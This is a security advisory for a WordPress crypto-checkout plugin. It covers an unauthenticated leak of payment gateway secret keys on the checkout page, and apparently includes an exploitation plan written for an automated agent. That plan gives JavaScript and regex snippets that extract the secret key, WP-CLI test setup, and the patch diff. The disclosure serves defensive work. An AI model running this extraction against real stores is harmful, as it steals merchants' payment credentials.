ABC Crypto Checkout <= 1.8.2 - Unauthenticated Information Exposure
Description
The ABC Crypto Checkout plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:NTechnical Details
<=1.8.2What Changed in the Fix
Changes introduced in v1.8.3
Source Code
WordPress.org SVNThis exploitation research plan targets **CVE-2026-52695**, a sensitive information exposure vulnerability in the **ABC Crypto Checkout** plugin (version <= 1.8.2). ### 1. Vulnerability Summary The vulnerability exists within the implementation of the WooCommerce Blocks integration for the Payerurl…
Show full research plan
This exploitation research plan targets CVE-2026-52695, a sensitive information exposure vulnerability in the ABC Crypto Checkout plugin (version <= 1.8.2).
1. Vulnerability Summary
The vulnerability exists within the implementation of the WooCommerce Blocks integration for the Payerurl gateway. Specifically, the class WC_Gateway_Payerurl_Blocks_Support (in class-payerurl-gateway-blocks.php) improperly handles configuration data. By returning the entire settings array to the WooCommerce Blocks registry without filtering out sensitive fields, the plugin exposes the merchant's Secret Key and Public Key to any user—including unauthenticated visitors—who accesses the checkout page.
2. Attack Vector Analysis
- Endpoint: The public WooCommerce Checkout page (rendered using the Checkout Block).
- Target Data: The
payerurl_secret_keyandpayerurl_public_key. - Authentication: None (Unauthenticated).
- Preconditions:
- The Payerurl gateway must be enabled.
- The store must be using the modern WooCommerce Checkout Block (standard in WooCommerce 8.0+).
- API credentials must be saved in the gateway settings.
3. Code Flow
- Plugin Initialization:
Payerurl::woocommerce_payerurl_block_support()(inpayerurl.php) registers the payment method block support by instantiatingWC_Gateway_Payerurl_Blocks_Support. - Data Preparation: The
WC_Gateway_Payerurl_Blocks_Support::initialize()method retrieves all gateway settings:$this->settings = get_option('woocommerce_wc_payerurl_gateway_settings', array()); - Data Exposure: The
get_payment_method_data()method (required by theAbstractPaymentMethodTypeinterface) returns the unfiltered$this->settingsarray. - Frontend Localization: WooCommerce Blocks calls
get_payment_method_data()and localizes the returned array into the frontend'swcSettingsglobal object (specifically for the checkout block) so that the JavaScript-based payment component can access its configuration. - Information Leak: The data is rendered into the HTML of the checkout page as a JSON object within a
<script>tag.
4. Nonce Acquisition Strategy
This vulnerability does not require a WordPress nonce. The exposure occurs during the standard rendering of the public Checkout page. No AJAX requests or authenticated endpoints are needed to trigger the leak; it is a passive information disclosure.
5. Exploitation Strategy
The exploitation involves navigating to the checkout page and extracting the JSON-encoded configuration data.
Step-by-Step Plan:
- Identify Checkout URL: Locate the store's checkout page (usually
/checkout/). - Navigate and Inspect: Use the browser to load the checkout page.
- Data Extraction: Use the
browser_evaltool to retrieve the sensitive settings from thewcSettingsglobal object.
HTTP Request (Verification):
GET /checkout/ HTTP/1.1
Host: [target_host]
User-Agent: Mozilla/5.0
Accept: text/html
Browser Evaluation (Extraction):
Execute the following JavaScript to extract the keys from the WooCommerce settings object:
// Access the payment method data from the global wcSettings object
const payerurlSettings = window.wcSettings?.paymentMethodData?.['wc_payerurl_gateway'];
if (payerurlSettings) {
console.log("Public Key:", payerurlSettings.payerurl_public_key);
console.log("Secret Key:", payerurlSettings.payerurl_secret_key);
return payerurlSettings;
} else {
return "Gateway settings not found in wcSettings.";
}
6. Test Data Setup
To reproduce this in a test environment:
- Install Requirements: Install WordPress, WooCommerce, and the ABC Crypto Checkout plugin (v1.8.2).
- Configure Gateway: Use WP-CLI to simulate a merchant configuration:
wp option update woocommerce_wc_payerurl_gateway_settings '{ "enabled": "yes", "payerurl_public_key": "PUB-TEST-123456", "payerurl_secret_key": "SEC-TEST-654321", "title": "Crypto Payment" }' --format=json - Ensure Checkout Block: Create a checkout page using the Block editor:
wp post create --post_type=page --post_title="Checkout" --post_status=publish --post_content='<!-- wp:woocommerce/checkout /-->' - Set as WooCommerce Checkout:
wp option update woocommerce_checkout_page_id $(wp post list --name="checkout" --post_type=page --field=ID)
7. Expected Results
Upon navigating to the checkout page, the browser_eval tool should return a JSON object containing the configured keys:
{
"enabled": "yes",
"payerurl_public_key": "PUB-TEST-123456",
"payerurl_secret_key": "SEC-TEST-654321",
"title": "Crypto Payment"
}
The presence of payerurl_secret_key in the frontend response confirms the information exposure.
8. Verification Steps
After the HTTP/browser-based extraction, verify that the extracted data matches the database state using WP-CLI:
wp option get woocommerce_wc_payerurl_gateway_settings --format=json
Compare the payerurl_secret_key field from the database to the value captured via the browser. If they match, the information disclosure is verified.
9. Alternative Approaches
If window.wcSettings is not directly accessible or formatted differently, search the page source for the Payerurl ID:
- Source Search: Perform a string search in the HTML source for
payerurl_secret_key.# Conceptual search via browser_eval browser_eval("document.documentElement.innerHTML.match(/payerurl_secret_key\":\"(.*?)\"/)[1]") - Legacy Checkout Check: If the store uses the Shortcode-based checkout (
[woocommerce_checkout]) instead of the Block-based checkout, the vulnerability may not be exploitable via theAbstractPaymentMethodTypepath, as that class specifically services the Blocks API. In that case, check forwp_localize_scriptcalls inclass-payerurl-gateway.phpthat might also leak settings to the legacy frontend.
Summary
The ABC Crypto Checkout plugin for WordPress exposes sensitive API credentials, including the merchant's Secret Key and Public Key, to unauthenticated users. This occurs because the WooCommerce Blocks integration class returns the unfiltered settings array to the frontend, which is then rendered into the global window.wcSettings JavaScript object on the public checkout page.
Vulnerable Code
/* class-payerurl-gateway-blocks.php:15 */ public function initialize() { $this->settings = get_option('woocommerce_wc_payerurl_gateway_settings', array()); $this->gateway = new WC_Payerurl(); } --- /* class-payerurl-gateway-blocks.php:49 */ public function get_payment_method_data() { return $this->settings; }
Security Fix
@@ -49,9 +48,28 @@ return array('wc-payerurl-payments-blocks'); } + /** + * FIX (CVE / Patchstack report): + * Previously returned $this->settings which exposed payerurl_secret_key + * and payerurl_public_key to the browser via window.wc.wcSettings. + * Now returns only the display fields the frontend checkout UI needs. + * Credentials never leave the server. + */ public function get_payment_method_data() { - return $this->settings; + return [ + 'title' => $this->get_setting('title', 'Crypto Payment via PayerURL'), + 'description' => $this->get_setting('description', 'Pay securely with cryptocurrency.'), + 'supports' => array_filter($this->gateway->supports, [$this->gateway, 'supports']), + ]; + } + + /** + * Helper to safely read a single setting without exposing the full array. + */ + private function get_setting($key, $default = '') + { + return isset($this->settings[$key]) ? $this->settings[$key] : $default; } }
Exploit Outline
The exploit is a passive information disclosure requiring no authentication or nonces. An attacker identifies a WooCommerce store using the modern Checkout Block with the PayerURL gateway enabled. By navigating to the checkout page, the attacker can access the browser's developer console and inspect the 'window.wcSettings' global object. The sensitive 'payerurl_secret_key' and 'payerurl_public_key' are stored within the 'paymentMethodData.wc_payerurl_gateway' property of this object, as the plugin fails to filter them out before localizing the payment method data for the JavaScript frontend.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.